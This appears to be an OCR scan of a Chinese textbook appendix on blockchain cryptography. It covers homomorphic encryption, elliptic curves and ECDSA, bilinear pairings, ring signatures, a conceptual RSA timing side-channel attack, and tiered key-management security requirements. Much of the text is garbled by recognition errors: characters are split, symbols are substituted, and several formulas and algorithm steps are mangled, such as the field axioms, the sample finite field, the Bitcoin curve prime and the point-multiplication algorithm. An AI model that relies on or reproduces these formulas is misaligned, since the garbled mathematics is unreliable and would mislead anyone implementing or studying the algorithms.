同 态 加 密 则 满足 : 对 于 明文 空间 中 的 任意 两 个 明文 m1，m2， 以 及 一 个 运算 OQ， 等 式 Encrypt(m1©m2)=Encrypt(m1)OEncrypt(m2) 成 立 。 当 运算 O 是 加 法 + 时 ,我们 称 该 加 密 方案 满足 加 法 同 态 。 事 
实 上 ， 运 算 @ 不 局 限于 加 法 ， 还 可 以 是 其 他 运算 ， 比 如 乘法 、 求 逆 运 算 等 。 当 一 个 同 态 加 密 体制 文 持 足够 多 的 同 态 运算 来 构造 我 们 需要 的 任意 函数 ， 就 称 它 为 全 同 态 加 密 ， 即 给 定 m1…m2 的 密 文 EIm1)， 
..vE(mt ， 对 于 任意 可 计算 的 函数 f，f(E(m1)…E(mab) 的 计算 结果 等 于 {tm1…，mab 的 加 密 结果 。Gentry 在 2009 年 构造 出 了 第 一 个 全 同 态 加 密 。 目 前 已 经 有 3 个 全 同 态 加 密 的 开源 库 : HElib、FHEW.、 


TFHE。 


全 同 态 可 以 应 用 于 隐私 查询 。 当 用 户 想 查询 一 个 明文 关键 词 时 ， 可 以 将 该 关键 词 加 密 ， 然 后 提交 给 搜索 引擎 ， 搜 索引 擎 将 直接 搜索 密 文 ， 无 须 解密 。 搜 索 结果 返回 给 用 户 ， 用 户 解密 后 的 结果 等 价 于 
明文 搜索 结果 。 这 样 搜索 引擎 是 不 知道 用 户 查询 了 哪个 关键 词 的 ， 保 护 了 用 户 的 隐私 。 同 态 加 密 还 可 以 结合 环 签名 一 起 使 用 ， 使 得 加 密 数 据 满足 完整 性 和 不 可 算 改 性 。 环 签名 允许 一 个 成 员 代 表 一 组 人 进 
行 签 名 而 不 泄漏 签名 者 的 信息 ， 验 证 者 只 知道 签名 来 自 这 个 环 ， 但 不 知道 谁 是 真正 的 签名 者 ， 这 样 可 以 解决 对 签名 者 匿名 问题 。 


A.4 数字 签名 


由 于 各 个 区 块 链 系统 中 广泛 使 用 了 椭圆 曲线 数字 签名 (ECDSA) ， 这 里 将 介绍 椭圆 曲线 的 数学 基础 知识 以 及 ECDSA 签 名 流程 ， 更 多 内 容 参 见 《Guide to elliptic curve cryptography》['] 
在 中 学 里 ， 我 们 学 过 有 理 数 域 、 实 数 域 ， 但 在 教材 中 从 没 出 现 过 “整数 域 ”这 个 词 ， 因 为 整数 不 构成 一 个 域 。 那 么 到 底 什么 是 域 ? 


定义 1: 设 R 是 一 个 非 空 集 合 ， 在 R 上 定义 两 个 代数 运算 ， 即 “+” 和 “”， 并 且 满 足以 下 条 件 ， 则 称 R 是 一 个 域 。 


(1) 封闭 性 : Va,bEeR,a+beR;a:bEeR。 

(2) 交换 律 : YabERa+b=b+a;a.b=b.a。 

(3) 结合 律 : Ya,b,cERa+(b+c)=(a+b)+c'a.(b:.c)=(a.b)'c。 

(4) 存在 单位 元 : VaeR,j0eR,s.t.a+0=a;31ER,s.t.a+1=a。 

(5) 存在 逆 元 : VaER3-aERsta+(-a)=0'VaER 上 ax03a-TERst.aa-1=1。 


(6) 分 配 律 : Va,b,cERa.(b+c)=(a.b)+(a.c)。 


df 


比如 ， 我 们 可 以 定义 一 个 集合 上 ， 这 个 集合 中 的 元 素 为 {I，1，2，3， 清 ， 加 法 定义 为 Ya,bE 呈 (a+b)mod 5， 乘 法 定义 为 Va,befs,(a-b)mod 5。 可 以 验证 ， 这 样 定义 的 集合 以 及 两 个 运算 满足 以 上 老 
闭 性 、 交 互 律 、 结 合 律 、 存 在 单位 元 、 存 在 逆 元 以 及 分 配 律 。 所 以 (2,+;) 是 一 个 域 。 


有 了 域 的 概念 ， 就 可 以 给 出 椭圆 曲线 的 定义 。 
定义 2: 设 K 是 一 个 域 ， 定 义 在 域 K 上 的 椭圆 曲线 E 是 指 方程 
y +arxy+aay=x +Tax +ayx+ac (A-1) 


其 中 a1，a2，a3，a4，a6Ek。 等 式 (A-1) 称 为 Weierstrass 方 程 。 如 果 椭圆 曲线 点 (x,y) 的 坐标 值 恰好 都 落 在 域 K 内 ,我们 就 称 之 为 E 的 K 有 理 点 。E 上 所 有 K 有 理 点 所 组 成 的 集合 记 为 E(K) 。 当 K 是 素 
数 域 ?时 ， 定 义 在 K 上 的 所 有 椭圆 曲线 都 可 以 简写 成 : 


y =x +axtb (A-2) 


这 里 a,bE 歹 。 比 特 币 就 使 用 了 素数 域 屯 上 的 椭圆 曲线 ， 其 中 参数 a=0，b=7，p=2226-23<-23-28-27-26-24-1。 这 条 椭圆 曲线 具有 一 个 自 同 态 映 射 p:E 一 E; gp:(%,y) 一 (Bx,y)，qp:0 一 O， 这 里 BEe 妨 是 一 
个 阶 为 3 的 元 素 。 于 是 任意 PeE，qp(P) 只 需要 一 次 有 限 域 乘法 就 可 以 完成 ， 应 用 于 椭圆 曲线 点 乘 就 可 以 提高 整个 椭圆 曲线 密码 系统 的 效率 。 


下 面 定义 椭圆 曲线 E 上 全 部 K 有 理 点 的 加 法 运算 。 设 P=(x1,y1) 和 Q= (x2,y2) 是 椭圆 曲线 E(K) 上 的 任意 两 点 。 


如 果 PQ 且 x1*x2， 用 一 条 直线 连接 P,Q 两 点 ， 则 直线 与 椭圆 曲线 E 将 相交 于 第 三 点 R'， 经 过 点 R' 的 垂直 线 与 椭圆 曲线 E 相 交 于 点 R， 定 义 R=P+Q， 如 图 A-2 所 示 。 
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图 A-2 椭圆 曲线 加 法 运算 
如 果 P#Q 但 x1=x>， 定义 P+ Q 等 于 无 穷 远 点 ， 记 为 O。 
如 果 P=Q， 经 过 点 P 作 一 条 切线 ， 则 切线 与 椭圆 曲线 E 将 相交 于 另外 一 点 R'， 经 过 R' 的 垂直 线 与 椭圆 曲线 E 相 交 于 点 R， 定 义 R=2P。 


有 了 这 个 加 法 运算 ,椭圆 曲线 E(K) 上 的 所 有 有 理 点 和 无 穷 远 点 O 便 构成 一 个 群 ， 因 为 它们 满足 群 的 定义 。 
1) 封闭 性 : VP,QeE(K)U{O}),P+QEE(K) UI{O}, 

2) 单位 元 : VPEE(K)U{O},4dOeE(K)U{O},s.t.P+O=P。 

3) 逆 元 : VPEE(K)U{O},3(-P)eE(QU{O},s.t.P+(-P)=0O。 

4) 结合 律 : VP,Q,REE(K)U{O},(P+Q)+R=P+(Q+R)。 


而 且 还 满足 交换 律 ， 即 VP,QEE(K)U{O}，P+Q=Q+P 所 有 (E(K)U{O},+) 是 一 个 交换 群 。 具体 的 计算 公式 为 P+Q=( 和 <+a1 和 -a2-X1-X2, 入 (X1-X3)-y1-a1X3-a3)。 其 中 当 Pz+Q 时 ， 入 =(y2-y1)/(X2-Xx1); 当 


P=Q 时 ， 入 = (3x<1 +2a2X1+a4-a1yY1)/(2y1+a1X1+a3)， 而 -P=(X1,-y1-a1X1-a3)。 


椭圆 曲线 的 点 乘 是 指 任 意 给 定 椭圆 曲线 上 的 点 P 以 及 正 整数 nh， 计 算 nP。 比 如 3P=P+P+P。 由 于 点 乘 是 椭圆 曲线 密码 中 最 耗 时 的 运算 ， 优 化 点 乘 的 算法 优 为 重要 的 研究 内 容 。 计 算 nP 的 原始 方法 就 是 
计算 1P,2P,3P.… 直 到 nP。 但 是 为 了 使 椭圆 曲线 密码 足够 安全 ， 参 数 n 一 般 都 选 得 很 大 ， 比 如 n>2160， 所 以 使 用 这 种 原始 的 方法 来 计算 nP 是 不 现实 的 。 二 进 制 法 优化 了 点 乘 的 计算 速度 。 


、 We _、 > Mme Dt 、 
设 n 的 二 进 制 表示 为 和 i=0” 过 ， 其 中 si=0 或 1， 且 sm-1=1， 则 


DP=(2(2( “22sm1tSm 2) 十 Sm-3) 十 机 “+s1)+so)P 
对 应 的 算法 流程 为 : 


算法 1. 从 左 到 右 的 二 进 制 方法 计算 点 乘 。 


输入 : n= SH PEE (K)。 
i=0 
输出 :Wr 


(yD 
(2)i 从 m1 到 0 循环 执行 : 
(VO 20: 


@@ 如 果 s==1， 则 计算 QO+P。 
(3) 返回 0。 


这 种 方法 需要 m 次 倍 点 运算 和 平均 m/2 次 点 加 运算 。 还 有 更 快 的 方法 ， 比 如 wNAF、 窗 口 方法 、 双 基 链 等 。 


比特 币 系 统 中 使 用 了 ECDSA 对 每 笔 交 易 进行 签名 ， 通 过 验证 签名 可 以 发 现 交易 是 否 被 自 改 或 伪造 。ECDSA 的 全 称 为 Elliptic Curve Digital Signature Algorithm， 


IEEE 1363 一 2000、1SO/IEC 15946-2 等 众多 标准 所 采纳 。 


算法 2.ECDSA 签名 生成 算法 。 


输入 : 参数 D = (9q, FR, 5S, a, b, P,n,h)， 私 钥 4， 消 息 m。 
输出 : 签名 (7, s)。 

(1) 从 区 间 [1,n-1」 中 随机 选择 整数 。 

(2 ) 计算 点 乘 P= (x,y)， 把 x 转换 成 整数 |。 

(3) 计算 r=xmodn， 如 果 r=0， 跳 转 到 步骤 (1 )。 

(4) 计算 e = Hash (m)。 

(5 ) 计算 s=f-1(e+dr) modn， 如果 s=0， 跳 转 到 步骤 (1 )。 
(6) 返回 (7, 8)。 


算法 3.ECDSA 签名 验证 算法 。 
输入 : 参数 D = (gq, FR,S, a, b, P, n,h)， 公 和 钥 OO， 消息 m， 签 名 (r, s)。 
输出 : 接受 或 拒绝 签名 。 


(1) 检查 r 和 s 是 否 是 区 间 [1 n-1] 中 的 整数 ， 如 果 不 是 ， 则 返回 “拒绝 签名 ”。 


(2 ) 计算 e = Hash (m)。 

(3 ) 计算 w=s "mod n。 

(4) 计 算 u,=ewmodn 以 及 uw,=rwmodn。 

(5) 计算 人 = wjP+u,0。 

(6) 如 果 针 = O， 则 返回 “拒绝 签名 ”。 

(7) 把 点 对 的 x 坐标 转换 成 整数 x ， 计算 v=ximodn。 

( 8) 如 果 v=r， 则 返回 “接受 签名 ”， 否 则 返回 “拒绝 签名 ”。 


由 s=k-1(e+dr)jmod n 可 得 : 
k=s!(et+dn)=s lets ird=wetwrd=u1+ud mod n 


所 以 X=u1P+u2Q=(u1+U2d)P=kP， 于 是 v=x1mod n=r。 


A.5” 双 线性 对 


双 线 性 对 是 一 个 映射 ， 它 把 椭圆 曲线 E(*) 上 的 两 个 点 映射 天 有限 域 水 中 的 一 个 元 素 。 双 线性 对 可 以 应 用 于 零 知识 证 明 协 议 、 门 限 签名 、 


密码 标准 SM9。 
定义 3: 设 G1，G2 是 加 法 群 ，G3 是 乘法 群 ， 如 果 映 身 : 
e:G1 XG —G3 
且 满 足 双 线性 : VP,P'eG1，VQ,Q'eEG2， 都 有 e(P+P',Q)=e(P,Q)e(P',Q)，e(P,Q+Q')=e(P,Q)e(P,Q')， 那 么 映射 e 就 称 为 双 线 性 对 。 


由 双 线 性 对 的 定义 可 以 得 到 以 下 性 质 : 


属性 加 密 、 标 识 密 码 


等 领域 ， 


已 经 被 ANSI X9.62、FIPS 186-2、 


国家 密码 管理 局 已 经 版 布 了 标识 


性 质 1. 设 e 是 一 个 双 线性 对 ， 令 PEG1 且 QE G2， 那 么 
ep,O)=e(O,Q=1 
e(-P,Q)=e(P,Q)1=e(P,.Q) 
Vi€ 2,e(P,Q=e(P,Qi=e(P,jQ)。 
双 线性 对 可 以 分 为 Weil、Tate、Ate 等 很 多 类 ， 区 分 它们 需要 代数 几何 中 复杂 的 数学 概念 ， 这 里 仅 给 出 计算 Tate 双 线性 对 的 原理 和 算法 。 
假设 ipjp 是 经 过 点 ip 和 jp 的 直线 ， 而 v(+jp 是 经 过 (i+j)P 的 垂直 线 ， 则 除 子 
(lipjp)=(P)+0P)+(-G+)P)-3(O) 
(erpp)=(G+)P)+(-G+)P)-2(0) 
于 是 
fiw PQ) = (+) P-((i+t)P) -i+ -1)(0) 
=[i(P)-— (iP) -Gi- DO + LAP) -0P)- 0- DAO) 
tOPH(- G+DP)-30O0)- (E+)DP)-(- +tDP) + 20)] 
lip,ip( QO) 
vi)L (QO) 


。 特 别 地 ， 当 i=j 时 fp(Q) = 了?p(Q0) 


二 P(O) fi Pp(O) 


[ip,ip( O) 
Vi+)P(O) 


这 样 Tate 双 线 性 对 可 以 通过 以 下 算法 来 计算 ， 通 第 称 之 为 Miller 算法 。 


所 以 jaO) = fs(Q)* fp(O) 


/ip 人 O) 
v2ip(O) 


算法 4. 计算 Tate 双 线 性 对 。 
从 人: PEE (FR [rl,QEE (FRE (Fp) 
输出 : e (P, 0)。 
(1) TP,fo1。 
(2 ) 从 Llogzj] -1 到 0 循环 执行 : 
I A(O) 








D Fr 一 广 ， 
@ 如 晒 "=1, 则 ff 了 A 外 ,TT+P， 
Vr+ p(O) 


(3 ) 输出 站。 


A.6 ” 环 签 名 


环 签名 是 一 种 特殊 的 数字 签名 ， 它 因为 签名 由 一 定 的 规则 组 成 一 个 环 而 得 名 。2001 年 ，Rivest、Shamir、Tauman 在 文献 提出 了 环 签 名 的 概念 所 。 环 签名 在 匿名 电子 选举 、 电 子 政务 等 方面 得 到 了 广 
泛 应 用 。 环 签名 只 有 用 户 没有 管理 者 ， 环 中 任何 一 个 成 员 都 可 以 代表 整个 环 签名 ， 而 验证 者 只 知道 签名 来 自 这 个 环 ， 但 不 知道 谁 是 真正 的 签名 者 。 任 何 用 户 都 可 以 用 自己 的 私 钥 和 其 他 环 中 成 员 的 公 钥 签 
名 ， 而 不 需要 其 他 成 员 同 意 ， 其 他 环 成 员 可 能 完全 不 知道 他 们 的 公 钥 已 经 被 真实 签名 者 用 于 签名 。 由 于 环 签名 隐藏 了 真实 签名 者 ， 因 此 环 签名 是 一 种 以 匿名 方式 透露 可 靠 消息 的 很 好 方法 。 环 签名 由 签名 
生成 和 签名 验证 组 成 ， 其 一 般 模型 如 下 。 


(1) 签名 生成 
m 为 待 签 名 的 消息 ，L={Pj},(i=1,2,..n) 为 形成 环 的 公 钥 集 合 ， 每 一 个 pi 与 一 个 变换 y; 有 关 ，Ss 表 示 签 名 者 的 私 钥 。 
1) 确定 k=h(m)。 
2) 签名 者 选择 初始 值 vE {0,1}b，。 
3) 确定 xi(i=1,2,.…n，izs): 签名 者 为 其 他 环 成 员 随机 选择 xiE R{0,1}b, 并 计算 y;=gi(xi)。 
4) 求解 ys: 从 环 方 程 ckv(y1…,ym)=v 中 解 出 ys。 
_ ”一 ] 
5) 求 陷 门 置换 的 逆 Xx。: 真实 签名 者 利用 其 陷 门 知识 ， 解 出 X 一 8 s (7;) 


6) 最 后 形成 环 签名 ， 消息 m 的 环 签 名 为 0=(P1,P2,.…,PnyV,X1,X2,..…Xn)。 


(2) 签名 验证 

1) 验证 者 计算 yi=gi(X?),(i=1,2,.…,n)。 

2) 验证 者 计算 k=h(m)。 

3) 验证 者 验证 方程 ckvy(y1,y2,.…yYn)=V， 如 果 等 式 成 立 ， 则 认为 环 签名 是 正确 的 ， 否 则 为 无 效 的 。 
一 般 的 环 签名 需要 满足 下 列 安全 性 要 求 。 


` 签名 是 可 信 的 : 任何 人 都 可 以 方便 地 验证 签名 的 有 效 性 。 


注 


i 


a 


名 是 不 可 伪造 的 : 除了 合法 的 签名 者 外 ， 其 他 任何 人 伪造 签名 都 是 很 困难 的 ， 是 计算 上 不 可 行 的 。 


了 


. 签名 具有 无 条 件 匿 名 性 : 只 要 签名 者 不 承认 ， 任 何人 知道 谁 是 真正 的 签名 者 的 概率 不 会 超过 猜测 的 概率 。 


A.7” 侧 信道 攻击 


密码 设备 在 运算 过 程 中 会 泄漏 各 种 物理 信息 ， 如 功 耗 、 电 磁 辐 射 、 时 间 、 声 音 、 可 见 光 等 。 利 用 这 些 物 理 信 息 也 是 可 以 破解 出 秘密 信息 的 ， 这 种 攻击 方法 被 称 为 侧 信道 攻击 。1996 年 美国 科学 家 
Kocher 首 先 发 现 针对 密码 芯片 的 计时 攻击 法 中 。 该 方法 通过 对 密码 芯片 运算 过 程 中 执行 时 间 信 息 的 采集 ， 结 合 密码 算法 的 内 部 实现 ， 证 实 了 算法 指令 和 执行 时 间 存 在 相关 性 ， 从 而 推测 出 密 钥 信息 。 由 于 
这 种 攻击 成 本 低 、 效 果 明 显 ， 立 刻 引 起 了 工业 界 和 学 术 界 的 广泛 关注 ， 并 相继 提出 了 功 耗 攻击 、 故 障 攻 击 、 电 磁 攻 击 等 ， 进 而 开创 了 密码 分 析 的 一 个 新 时 代 。 


2011 年 ， 德 国 波 鸿 鲁 尔 大 学 Paar 教 授 领导 的 研究 小 组 对 DEsFire MF3ICD40 智 能 卡 进行 了 成 功 分 析 ， 在 很 短 时 间 内 提取 了 其 中 的 密 钥 信息 。 在 此 之 前 ， 该 卡片 已 经 通过 了 CC EAL 4+ 的 认证 ， 声 称 具 
有 很 高 的 安全 性 能 ， 被 广泛 应 用 在 世界 各 地 的 大 型 文 付 系统 和 公共 交通 系统 中 。 卡 片 被 成 功 分 析 的 当日 ，NXP 公 司 即 在 主页 上 告知 用 户 该 卡片 被 攻破 ， 将 提供 相应 的 升级 手段 ， 并 宣布 于 2011 年 底 停止 该 
卡片 的 生产 和 维护 。 


在 此 以 密码 芯片 中 RSA 的 计时 攻击 为 例 ， 介 绍 侧 信道 攻击 的 思想 。RSA 解 密 时 ， 需 要 计算 模 军 M=Cdmod N， 这 里 C 是 密 文 ，N 是 公 钥 ，d 是 私 铀 。 攻 击 者 的 目标 就 是 获取 私 铀 d。 攻 击 者 可 以 使 用 同一 
个 公 钥 来 加 密 不 同 消息 Mi， 然 后 发 送 给 密码 芯片 。 对 于 不 同 的 密 文 Cj， 攻击 者 记录 模 军 C:mod X 的 运行 时 间 。 计 算 模 寡 有 很 多 算法 ， 以 下 是 一 个 典型 的 算法 。 


算法 5. 计算 醒 硕 。 


WwW=1] 
输入 : C,N, d= 2,d2', 其 中 d=1。 


i= 人 0 
输出 : C” mod N。 
1)M<—C。 
2 ) 从 w-2 到 0 循环 执行 : 
OD 计算 MM? mod N。 
g 当 d 的 第 大 比特 等 于 1 时 计算 M+ MC modN; 否则 MM。 
3 ) 输出 M。 
从 以 上 算法 可 以 发 现 ， 当 密 钥 的 第 k 比 特 为 1 时 ， 将 计算 模 乘 和 模 平 方 ; 而 当 密 钥 的 第 k 比 特 为 0 时 ， 则 只 计算 模 平方 ， 这 就 会 导致 计算 时 间 的 差异 。 另 外 ， 当 时 M:C>N 时 ,， 才 会 进行 mod N 运 算 ; 而 
当 M:C<N 时 ，M 富 M:C 这 也 会 导致 计算 时 间 的 差异 。 基 于 这 两 个 事实 ,就 可 以 进行 计时 攻击 。 


选取 m 对 密 文 C 和 Di， 满 足 C< N, Di<N< Di;。 当 k=w-2 时 ， 因 为 C1< 和 NN， 所 以 实际 上 步骤 @ 和 步骤 @ 不 需要 进行 mod N 操 作 。 而 输入 D 时 ， 因 为 D:<N<D;， 当 dw_2=1 时 ， 将 在 步骤 @ 进 行 mod N 


个 别 C;Dj 并 不 明显 ， 但 通过 统计 是 可 以 发 现 这 个 时 间 差 异 的 。 记 Cmod N 的 计算 时 间 为 T1;,Ci mod X 的 计算 时 间 为 T?ij， 念 平均 时 间 T1=(T11+T12+...+T1m/m,T2=(T21+T22+.……+T2m/m。 基 于 以 上 分 析 可 
以 得 到 : 当 dw_2=1 时 ，T2>T1+e。 这 里 e 是 一 个 国定 值 ， 可 以 通过 事先 的 统计 来 确定 。 


假设 已 经 确定 dw_2=1， 于 是 可 以 再 重新 选取 m 对 密 文 C 和 Ci， 满 足 C < 和 ,Di< NN <D;， 类 似 以 上 分 析 方 法 ， 可 以 确定 dw3 的 值 。 以 此 类 推 ， 就 可 以 确定 密 钥 d 的 所 有 比特 ， 从 而 破解 整个 RSA 密 码 系 
统 。 

起 初 ， 侧 信道 攻击 主要 针对 密码 心 片 ， 但 是 后 来 这 种 分 析 方 法 被 推广 到 了 远程 攻击 。 比 如 2005 年 ， 计 时 攻击 就 分 析 了 局 域 网 中 的 OpenSSL 协 议 , 成 功 获取 了 其 中 的 RSA 密 钥 ; 2011 年 ， 计 时 攻击 分 析 
了 OpenssL 中 的 椭圆 曲线 密码 算法 。 
A.8 区 块 链 安全 分 析 方 法 论 


这 一 节 主 要 叙述 分 析 区 块 链 安全 性 的 方法 ， 当 制定 区 块 链 安全 性 测试 标准 时 ， 本 节 的 内 容 可 以 提供 参考 价值 。 


(1) 级 别 | 
使 用 检测 机 构 指 定 的 数据 进行 Hash 函 数 运算 ,测试 对 象 返回 的 结果 应 与 预期 一 致 。 
@ 使 用 检测 机 构 指 定 的 密 钥 对 特定 数据 进行 加 密 ， 测 试 对 象 返 回 的 加 密 结 果 应 与 预期 一 致 。 
@ 使 用 检测 机 构 指 定 的 密 钥 对 特定 数据 进行 解密 ， 测 试 对 象 返 回 的 解密 结果 应 与 预期 一 致 。 
@ 使 用 检测 机 构 指 定 的 私 钥 对 特定 数据 进行 数字 签名 ， 测 试 对 象 返 回 的 签名 结果 应 与 预期 一 致 。 


@ 使 用 检测 机 构 指 定 的 公 铀 对 特定 数据 进行 签名 验证 ， 测 试 对象 返 回 的 验证 结果 应 与 预期 一 致 。 


(2) 级 别 1| 
四 密码 算法 实现 时 ， 充 分 考虑 了 防御 侧 信道 攻击 。 
@ 公 钥 密码 算法 为 SM 2 算法 ， 算 法 定义 见 GM/T0003 一 2012。 
@@ 哈 希 算法 为 SM 3 算法 ， 算 法 定义 见 CM/T0004 一 2012。 
@ 对 称 加 密 算法 为 SM4 算 法 ， 算 法 定义 见 GM/T0002 一 2012。 


@ 标 识 密码 算法 为 SM 9 算法 ， 算 法 定义 见 GM/T0044 一 2016。 


2. 密 钥 生 成 


这 里 对 密 钥 以 及 密 钥 种 子 的 生成 提出 了 要 求 ， 需 要 生成 的 密 钥 以 及 密 钥 种 子 满足 机 密 性 和 不 可 预测 性 。 机 密 性 要 求 新 生成 的 密 钥 和 密 钥 种 子 不 能 被 非 授权 的 用 户 读 取 ;不 可 预测 性 要 求 新 生成 的 密 钥 
和 密 钥 种 子 不 能 被 非 授权 的 用 户 推测 或 计算 出 来 。 


(1) 级 别 | 
@ 密 钥 以 及 密 钥 种 子 由 使 用 者 生成 ， 这 是 为 了 保证 其 机 密 性 。 当 需要 备份 密 钥 时 ， 需 要 加 密 传输 ， 并 且 以 密 文 形式 存储 。 生 成 的 密 钥 应 该 拥有 足够 的 炳 。 
@ 密 钥 以 及 密 钥 种 子 的 生成 方法 能 够 在 使 用 前 被 验证 为 肥效 的 。 


@ 如 果 使 用 软件 生成 密 钥 种 子 ， 则 需要 排除 种 子 是 确定 性 的 ， 而 且 不 能 把 种 子 传输 给 其 他 用 户 。 当 软件 审核 通过 后 ， 需 要 生成 并 发 布 一 个 数字 签名 。 每 次 运行 这 个 软件 前 ， 必 须 先 验 证 数字 签名 ， 以 
免 软件 被 得 改 。 


@ 如 果 不 是 使 用 软件 生成 密 钥 或 密 钥 种 子 ， 仍 然 需 要 验证 生成 方法 ， 以 保证 生成 结果 的 随机 性 。 
(2) 级 别 1 


密 钥 以 及 密 钥 种 子 可 以 使 用 伪 随 机 数 发 生 器 (PRNG) 生成 ， 但 NIST SP 800-90A 中 的 Dual EC DRBG 已 经 被 确定 为 脆弱 的 随机 数 生成 器 ， 不 能 使 用 ; 也 可 以 使 用 真 随机 数 发 生 器 (TRNG) 。 无 论 使 
用 哪 种 生成 器 ， 生 成 的 密 钥 都 必须 通过 随机 性 测试 ， 比 如 GM/T0005 一 2012《 随 机 性 检测 规范 》、NIST STS、Crypt-X 或 DIEHARD 等 。 


3. 密 钥 长 度 


密 钥 长 度 是 密码 算法 的 一 个 重要 参数 。 当 密 钥 长 度 很 短 时 ， 容 易 使 用 穷 搜索 方法 计算 出 密 钥 ; 而 且 对 于 特定 的 密码 算法 ， 还 存在 一 些 更 强 的 分 析 方 法 ， 比 如 针对 RSA 的 数 域 筛 算法 、 针 对 椭圆 曲线 密 
码 的 Pollard rho 算 法 等 。 为 此 ， 非 常 有 必要 给 出 一 个 密 钥 长 度 的 规范 ， 而 且 随 着 分 析 方 法 的 发 展 ， 密 钥 长 度 也 需要 及 时 更 新 。 国 际 银行 卡 组 织 EMVCo 就 是 每 年 对 密 钥 长 度 进行 评估 ， 并 发 布 密 钥 长 度 建 
议 。 


(1) 级 别 | 

Q@ 对 称 密码 密 钥 长 度 大 于 等 于 112 比 特 。 

Q@RSA 密 钥 长 度 大 于 等 于 2048 比 特 。 

@ 椭 圆 曲 线 密码 (ECC 和 SM2) 密 钥 长 度 大 于 等 于 224 比 特 。 

图 标识 密码 (SM9) 主 密 钥 长 度 大 于 等 于 224 比 特 。 

(2) 级 别 1| 

@ 对 称 密 码 密 钥 长 度 大 于 等 于 128 比 特 。 

Q@RSA 密 钥 长 度 大 于 等 于 3072 比 特 。 

@ 椭 圆 曲 线 密码 (ECC 和 SM2) 密 钥 长 度 大 于 等 于 256 比 特 。 

@ 标 识 密码 (SM9) 主 密 钥 长 度 大 于 等 于 256 比 特 。 
4. 钱 包 生成 

生成 钱包 的 过 程 中 使 用 了 数字 签名 ， 它 能 确保 完整 性 ， 防 止 数字 资产 丢失 或 被 盗 等 。 

(1) 级 别 | 

每 一 次 交易 都 必须 生成 唯一 的 地 址 ， 这 样 可 以 增加 隐私 性 ， 使 得 攻击 者 很 难 确 定 地 址 所 对 应 的 用 户 。 

(2) 级 别 | 

@ 钱 包 生 成 的 任意 地 址 必须 至 少 有 两 重 签名 ， 这 样 可 以 提升 防盗 、 防 丢 的 安全 性 。 

@ 当 主 密 钥 丢 失 后 ， 为 了 仍然 可 以 使 用 钱包 ， 有 必要 为 每 个 钱包 设置 元 余 的 密 钥 。 

@ 所 有 地 址 都 是 由 秘密 保存 的 种 子 来 生成 。 

@ 对 同一 钱包 具有 签名 权限 的 不 同 密 钥 ， 必 须 存储 在 不 同 的 地 方 ， 这 样 就 可 以 防范 火灾 、 洪 水 、 地 震 等 风险 。 
5. 密 钥 存 储 


当 密 铀 和 密 钥 种 子 不 使 用 时 ， 它 们 应 该 被 妥善 存储 。 为 了 最 大 限度 地 提高 密 钥 的 机 密 性 ， 它 们 应 该 以 安全 的 方式 存储 ， 在 适当 的 情况 下 可 以 使 用 加 密 技术 ， 确 保 在 密码 设备 保护 的 环境 之 外 安全 地 管 
理 被 加 密 的 密 钥 。 密 钥 加 密 是 一 种 用 一 个 密 钥 加 密 另 一 个 密 钥 的 技术 ， 用 来 完成 这 种 加 密 的 密 钥 称 为 密 钥 加 密 密 钥 (KEK) 。 虽 然 密 钥 加 密 确保 了 密 钥 的 机 密 性 ， 但 为 了 确保 充分 的 密 钥 分 离 ， 防 止 密 钥 


蔡 换 及 确保 密 钥 的 完整 性 ， 需 要 其 他 技术 与 密 钥 加 密 联合 使 用 ， 比 如 秘密 共享 、 物 理 锁 、 密 钥 备份 等 策略 。 备 份 密 钥 可 以 在 密 钥 丢失 后 进行 恢复 。 应 该 确保 备份 密 钥 如 主 密 角 一样 被 安全 地 人 存储 。 
(1) 级 别 | 
@ 如 果 密 钥 以 明文 方式 存储 ， 只 应 存在 于 安全 的 密码 专用 设备 中 ;否则 应 该 加 密 后 存储 。 
@ 密 钥 和 密 钥 种 子 应 当 存 在 备份 ， 备 份 形式 可 以 是 纸 质 ， 也 可 以 是 数字 。 
@ 备 份 系统 能 够 防御 火灾 、 洪 水 等 自然 灾害 ， 而 保护 的 具体 措施 可 以 根据 备份 的 不 同 介 质 类 型 而 有 所 不 同 。 
(2) 级 别 1 


@@ 密 钥 使 用 冷 储 仔 ， 即 在 一 台 离 线 的 计算 机 上 生成 比特 币 地 址 和 私 铀 ， 并 将 其 妥善 保存 起 来 。 以 后 挖 矿 或 者 在 交易 平台 得 到 的 比特 币 都 可 以 用 到 这 个 离线 生成 的 比特 币 地 址 上 。 由 这 人 台 计 算 机 生成 的 
私 钥 永远 不 要 在 其 他 计算 机 或 者 网 络 上 出 现 。 


@ 应 该 备份 足够 多 的 密 钥 ， 比 如 当 交 易 系统 采用 了 3 取 2 的 签名 方案 ， 则 至 少 备份 3 个 密 钥 中 的 2 个 。 
@ 备 份 的 密 钥 和 密 钥 种 子 应 该 与 主 密 钥 、 主 密 钥 种 子 处 在 不 同 的 地 理 位 置 ， 比 如 把 备份 放 在 可 信 的 第 三 方 托管 中 心 。 


@ 备 份 系统 必须 防止 非 授权 访问 。 备 份 必须 采用 某 种 形式 的 防 自 改 机 制 ， 人 允许 操 作 员 确定 何 时 被 访问 过 了 。 比 如 实现 带 有 序列 号 的 防 拆 包装 袋 或 带 有 手写 签名 的 密封 信封 。 


6 密 钥 使 用 
密 钥 和 密 铀 种 子 应 该 被 安全 地 使 用 ， 否 则 会 存在 各 种 风险 ， 比 如 资金 被 盗 、 恶 意 软 件 自 改 或 复制 密 铀 等 . 
(1) 级 别 | 
@ 应 防止 密 铀 的 未 授权 使 用 。 主 密 钥 和 主 密 钥 种 子 的 访问 需要 身份 标识 以 及 至 少 一 种 认证 。 认 证 方式 有 口令 、 手 机 认证 、USB 认 证 、 动 态 令 牌 等 ， 
@ 一 个 密 钥 只 应 用 于 一 种 功能 。 当 确认 或 怀疑 某 个 密 钥 泄漏 时 ， 应 停止 使 用 该 密 铀 。 
@@ 所 有 密 铅 和 密 钥 种 子 仅 在 受信 任 的 环境 中 使 用 。 这 样 可 以 降低 风险 ， 比 如 被 恶意 软件 非法 复制 。 安 全 的 环境 可 以 防止 非 授权 用 户 获得 密 钥 或 敏感 信息 。 
(2) 级 别 1 
@ 主 密 铀 和 主 密 钥 种 子 的 访问 需要 身份 标识 以 及 至 少 两 种 认证 。 
@ 交 易 的 目标 地 址 和 金额 是 在 密 铀 和 密 钥 种 子 使 用 之 前 ， 通 过 一 个 已 认证 的 可 信 通 道 确定 的 。 
